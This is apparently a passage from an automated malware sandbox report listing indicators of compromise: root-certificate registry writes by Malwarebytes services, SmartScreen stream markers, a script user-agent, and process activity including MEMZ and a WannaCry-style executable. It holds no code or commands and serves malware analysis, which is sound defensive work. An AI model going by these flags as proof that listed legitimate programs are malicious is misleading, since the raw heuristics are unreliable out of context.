Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 5c00000001000000040000000008000019000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b6885186868000000010000000800000000409120d035d9017e0000000100000008000000000063f58926d7011d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b0400000001000000100000001d3554048578b03f42424dbf20730a3f20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\24A40A1F573643A67F0A4B0749F6A22BF28ABB6B	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob = 040000000100000010000000ebb04f1d3a2e372f1dda6e27d6b680fa1400000001000000140000003edf290cc1f5cc732ceb3d24e17e52dabd27e2f00b000000010000003400000056006500720069005300690067006e002000540069006d00650020005300740061006d00700069006e006700200043004100000009000000010000000c000000300a06082b0601050507030803000000010000001400000018f7c1fcc3090203fd5baa2f861a754976c8dd250f000000010000001000000065fc47520f66383962ec0b7b88a0821d190000000100000010000000e53d34cecb05c17ee332c749d78c02562000000001000000c0020000308202bc3082022502104a19d2388c82591ca55d735f155ddca3300d06092a864886f70d010104050030819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e301e170d3937303531323030303030305a170d3034303130373233353935395a30819e311f301d060355040a1316566572695369676e205472757374204e6574776f726b31173015060355040b130e566572695369676e2c20496e632e312c302a060355040b1323566572695369676e2054696d65205374616d70696e67205365727669636520526f6f7431343032060355040b132b4e4f204c494142494c4954592041434345505445442c20286329393720566572695369676e2c20496e632e30819f300d06092a864886f70d010101050003818d0030818902818100d32e20f0687c2c2d2e811cb106b2a70bb7110d57da53d875e3c9332ab2d4f6095b34f3e990fe090cd0db1b5ab9cde7f688b19dc08725eb7d5810736a78cb7115fdc658f629ab585e9604fd2d621158811cca7194d522582fd5cc14058436ba94aab44d4ae9ee3b22ad56997e219c6c86c04a47976ab4a636d5fc092dd3b4399b0203010001300d06092a864886f70d01010405000381810061550e3e7bc792127e11108e22ccd4b3132b5be844e40b789ea47ef3a707721ee259efcc84e389944cdb4e61efb3a4fb463d50340b9f7056f68e2a7f17cee563bf796907732eb095288af5edaaa9d25dcd0aca10098fceb3af2896c479298492dcffba674248a69010e4bf61f89c53e593d1733ff8fd9d4f84ac55d1fd116363	MBAMService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b00000001000000260000005300650063007400690067006f00200028004100640064005400720075007300740029000000620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff2140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a1d000000010000001000000006f9583c00a763c23fb9e065a3366d557e0000000100000008000000000063f58926d70168000000010000000800000000409120d035d90103000000010000001400000002faf3e291435468607857694df5e45b6885186819000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	MBAMService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A	MBAMInstallerService.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD\Blob = 0300000001000000140000001c58a3a8518e8759bf075b76b750d4f2df264fcd2000000001000000c2040000308204be308203a6a003020102021006d8d904d5584346f68a2fa754227ec4300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3231303431343030303030305a170d3331303431333233353935395a304f310b300906035504061302555331153013060355040a130c446967694365727420496e633129302706035504031320446967694365727420544c53205253412053484132353620323032302043413130820122300d06092a864886f70d01010105000382010f003082010a0282010100c14bb3654770bcdd4f58dbec9cedc366e51f311354ad4a66461f2c0aec6407e52edcdcb90a20eddfe3c4d09e9aa97a1d8288e51156db1e9f58c251e72c340d2ed292e156cbf1795fb3bb87ca25037b9a52416610604f571349f0e8376783dfe7d34b674c2251a6df0e9910ed57517426e27dc7ca622e131b7f238825536fc13458008b84fff8bea75849227b96ada2889b15bca07cdfe951a8d5b0ed37e236b4824b62b5499aecc767d6e33ef5e3d6125e44f1bf71427d58840380b18101faf9ca32bbb48e278727c52b74d4a8d697dec364f9cace53a256bc78178e490329aefb494fa415b9cef25c19576d6b79a72ba2272013b5d03d40d321300793ea99f50203010001a38201823082017e30120603551d130101ff040830060101ff020100301d0603551d0e04160414b76ba2eaa8aa848c79eab4da0f98b2c59576b9f4301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302307606082b06010505070101046a3068302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304006082b060105050730028634687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63727430420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63726c303d0603551d2004363034300b06096086480186fd6c02013007060567810c01013008060667810c0102013008060667810c0102023008060667810c010203300d06092a864886f70d01010b050003820101008032ce5e0bdd6e5a0d0aafe1d684cbc08efa8570edda5db30cf72b7540fe850afaf33178b7704b1a8958ba80bdf36b1de97ecf0bba589c59d490d3fd6cfdd0986db771825bcf6d0b5a09d07bdec443d82aa4de9e41265fbb8f99cbddaee1a86f9f87fe74b71f1b20abb14fc6f5675d5d9b3ce9ff69f7616cd6d9f3fd36c6ab038876d24b2e7586e3fcd8557d26c21177df3e02b67cf3ab7b7a86366fb8f7d89371cf86df7330fa7babed2a59c842843b11171a52f3c90e147da25b7267ba71ed574766c5b8024a65345e8bd02a3c209c51994ce7529ef76b112b0d927e1de88aeb36164387ea2a63bf753febdec403bb0a3cf730efebaf4cfc8b3610733ef3a4	MBAMInstallerService.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\D772DA0874059418FCDAACE3F4FF2AC964A852FF	MBAMService.exe

NTFS ADS 6 IoCs

Processes:

msedge.exemsedge.exeMBAMInstallerService.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 890988.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 177350.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 778306.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 96224.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 601582.crdownload:SmartScreen	msedge.exe
File created	C:\Program Files\Malwarebytes\Anti-Malware\mbuns.exe\:SmartScreen:$DATA	MBAMInstallerService.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc stream

HTTP User-Agent header 244 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) 1

description	flow	ioc	stream
HTTP User-Agent header	244	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exechrome.exepowershell.exeUpdates.exemsedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exemsedge.exeMBSetup.exeMBAMInstallerService.exemsedge.exeMBAMService.exeMalwarebytes.exemsedge.exeMEMZ (1).exeMEMZ (1).exe

pid	process
1388	powershell.exe
1388	powershell.exe
1388	powershell.exe
6876	powershell.exe
6876	powershell.exe
6868	chrome.exe
6868	chrome.exe
3488	powershell.exe
3488	powershell.exe
3488	powershell.exe
1852	Updates.exe
5556	msedge.exe
5556	msedge.exe
5320	msedge.exe
5320	msedge.exe
6416	identity_helper.exe
6416	identity_helper.exe
2068	msedge.exe
2068	msedge.exe
3904	powershell.exe
3904	powershell.exe
3904	powershell.exe
2352	msedge.exe
2352	msedge.exe
5184	MBSetup.exe
5184	MBSetup.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
1868	MBAMInstallerService.exe
2360	msedge.exe
2360	msedge.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
988	MBAMService.exe
6244	Malwarebytes.exe
6244	Malwarebytes.exe
988	MBAMService.exe
988	MBAMService.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
1672	msedge.exe
988	MBAMService.exe
988	MBAMService.exe
1868	MEMZ (1).exe
1868	MEMZ (1).exe
1868	MEMZ (1).exe
2504	MEMZ (1).exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

mmc.exe@[email protected]

pid process

3332 mmc.exe
2864 @[email protected]
Suspicious behavior: LoadsDriver 14 IoCs

Processes:

pid process

652
652
652
652
652
652
652
652
652
652
652
652
652
652

pid	process
3332	mmc.exe
2864	@[email protected]

pid	process
652
652
652
652
652
652
652
652
652
652
652
652
652
652

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

Processes:

chrome.exemsedge.exemsedge.exemsedge.exemsedge.exe

pid	process
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
2836	msedge.exe
4952	msedge.exe
4952	msedge.exe
4952	msedge.exe
4952	msedge.exe
4952	msedge.exe
4952	msedge.exe
4952	msedge.exe
6196	msedge.exe
6196	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exechrome.exeUpdates.exepowershell.exesspcss.exeMBAMInstallerService.exe

description	pid	process
Token: SeDebugPrivilege	1388	powershell.exe
Token: SeDebugPrivilege	6876	powershell.exe
Token: SeDebugPrivilege	3488	powershell.exe
Token: SeShutdownPrivilege	6868	chrome.exe
Token: SeCreatePagefilePrivilege	6868	chrome.exe
Token: SeShutdownPrivilege	6868	chrome.exe
Token: SeCreatePagefilePrivilege	6868	chrome.exe
Token: SeShutdownPrivilege	6868	chrome.exe
Token: SeCreatePagefilePrivilege	6868	chrome.exe
Token: SeShutdownPrivilege	6868	chrome.exe
Token: SeCreatePagefilePrivilege	6868	chrome.exe
Token: SeDebugPrivilege	1852	Updates.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	2936	sspcss.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe
Token: SeDebugPrivilege	1868	MBAMInstallerService.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exemsedge.exeMBSetup.exe

pid	process
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5184	MBSetup.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exemsedge.exeMalwarebytes.exe

pid	process
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
6868	chrome.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
5320	msedge.exe
6244	Malwarebytes.exe
